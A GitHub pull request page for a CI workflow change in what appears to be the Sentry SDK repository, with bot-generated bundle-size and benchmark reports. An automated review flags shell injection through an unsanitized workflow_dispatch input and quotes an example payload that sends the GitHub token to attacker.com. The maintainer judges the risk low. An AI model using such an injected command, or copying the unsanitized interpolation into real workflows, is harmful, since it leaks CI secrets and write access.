Skip to content

Comments

ci(fix-security-vulnerability): Run fetch alert first before executing skill#19418

Open
nicohrubec wants to merge 1 commit intodevelopfrom
nh/alert-step
Open

ci(fix-security-vulnerability): Run fetch alert first before executing skill#19418
nicohrubec wants to merge 1 commit intodevelopfrom
nh/alert-step

Conversation

@nicohrubec
Copy link
Member

@nicohrubec nicohrubec commented Feb 19, 2026

Closes #issue_link_here

Closes #19419 (added automatically)

Copy link

@cursor cursor bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Cursor Bugbot has reviewed your changes and found 1 potential issue.

Bugbot Autofix is OFF. To automatically fix reported issues with Cloud Agents, enable Autofix in the Cursor dashboard.

- name: Extract alert number
id: alert
run: |
INPUT="${{ github.event.inputs.alert }}"
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Script injection via unsanitized workflow dispatch input

High Severity

The github.event.inputs.alert value is directly interpolated into a shell run: block via INPUT="${{ github.event.inputs.alert }}". This is a classic GitHub Actions script injection — a user who can trigger workflow_dispatch could supply a crafted input (e.g., containing "; curl attacker.com/exfil?t=$(cat $GITHUB_TOKEN) #) to execute arbitrary commands within the runner context, which has contents: write, pull-requests: write, and access to secrets.ANTHROPIC_API_KEY. The safe pattern (used in other workflows like build.yml) is to pass the input through an env: block instead.

Fix in Cursor Fix in Web

Triggered by project rule: PR Review Guidelines for Cursor Bot

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fair point but low risk since only we can trigger this

@github-actions
Copy link
Contributor

github-actions bot commented Feb 19, 2026

Codecov Results 📊


Generated by Codecov Action

@github-actions
Copy link
Contributor

Codecov Results 📊

1 passed | Total: 1 | Pass Rate: 100% | Execution Time: 1.97s

All tests are passing successfully.


Generated by Codecov Action

@github-actions
Copy link
Contributor

size-limit report 📦

Path Size % Change Change
@sentry/browser 25.61 kB - -
@sentry/browser - with treeshaking flags 24.12 kB - -
@sentry/browser (incl. Tracing) 42.42 kB - -
@sentry/browser (incl. Tracing, Profiling) 47.08 kB - -
@sentry/browser (incl. Tracing, Replay) 81.24 kB - -
@sentry/browser (incl. Tracing, Replay) - with treeshaking flags 70.86 kB - -
@sentry/browser (incl. Tracing, Replay with Canvas) 85.93 kB - -
@sentry/browser (incl. Tracing, Replay, Feedback) 98.09 kB - -
@sentry/browser (incl. Feedback) 42.33 kB - -
@sentry/browser (incl. sendFeedback) 30.28 kB - -
@sentry/browser (incl. FeedbackAsync) 35.28 kB - -
@sentry/browser (incl. Metrics) 26.78 kB - -
@sentry/browser (incl. Logs) 26.92 kB - -
@sentry/browser (incl. Metrics & Logs) 27.6 kB - -
@sentry/react 27.37 kB - -
@sentry/react (incl. Tracing) 44.76 kB - -
@sentry/vue 30.06 kB - -
@sentry/vue (incl. Tracing) 44.26 kB - -
@sentry/svelte 25.64 kB - -
CDN Bundle 28.16 kB - -
CDN Bundle (incl. Tracing) 43.25 kB - -
CDN Bundle (incl. Logs, Metrics) 29 kB - -
CDN Bundle (incl. Tracing, Logs, Metrics) 44.09 kB - -
CDN Bundle (incl. Replay, Logs, Metrics) 68.08 kB - -
CDN Bundle (incl. Tracing, Replay) 80.12 kB - -
CDN Bundle (incl. Tracing, Replay, Logs, Metrics) 80.99 kB - -
CDN Bundle (incl. Tracing, Replay, Feedback) 85.56 kB - -
CDN Bundle (incl. Tracing, Replay, Feedback, Logs, Metrics) 86.46 kB - -
CDN Bundle - uncompressed 82.33 kB - -
CDN Bundle (incl. Tracing) - uncompressed 128.05 kB - -
CDN Bundle (incl. Logs, Metrics) - uncompressed 85.17 kB - -
CDN Bundle (incl. Tracing, Logs, Metrics) - uncompressed 130.88 kB - -
CDN Bundle (incl. Replay, Logs, Metrics) - uncompressed 208.83 kB - -
CDN Bundle (incl. Tracing, Replay) - uncompressed 244.93 kB - -
CDN Bundle (incl. Tracing, Replay, Logs, Metrics) - uncompressed 247.75 kB - -
CDN Bundle (incl. Tracing, Replay, Feedback) - uncompressed 257.73 kB - -
CDN Bundle (incl. Tracing, Replay, Feedback, Logs, Metrics) - uncompressed 260.54 kB - -
@sentry/nextjs (client) 47.17 kB - -
@sentry/sveltekit (client) 42.88 kB - -
@sentry/node-core 52.17 kB +0.03% +15 B 🔺
@sentry/node 166.53 kB +0.01% +7 B 🔺
@sentry/node - without tracing 93.95 kB +0.02% +11 B 🔺
@sentry/aws-serverless 109.45 kB +0.01% +8 B 🔺

View base workflow run

@github-actions
Copy link
Contributor

node-overhead report 🧳

Note: This is a synthetic benchmark with a minimal express app and does not necessarily reflect the real-world performance impact in an application.

Scenario Requests/s % of Baseline Prev. Requests/s Change %
GET Baseline 8,790 - 9,139 -4%
GET With Sentry 1,628 19% 1,669 -2%
GET With Sentry (error only) 5,957 68% 6,053 -2%
POST Baseline 1,174 - 1,186 -1%
POST With Sentry 559 48% 574 -3%
POST With Sentry (error only) 1,026 87% 1,031 -0%
MYSQL Baseline 3,150 - 3,196 -1%
MYSQL With Sentry 416 13% 468 -11%
MYSQL With Sentry (error only) 2,588 82% 2,596 -0%

View base workflow run

@nicohrubec nicohrubec self-assigned this Feb 20, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

ci(fix-security-vulnerability): Run fetch alert first before executing skill

2 participants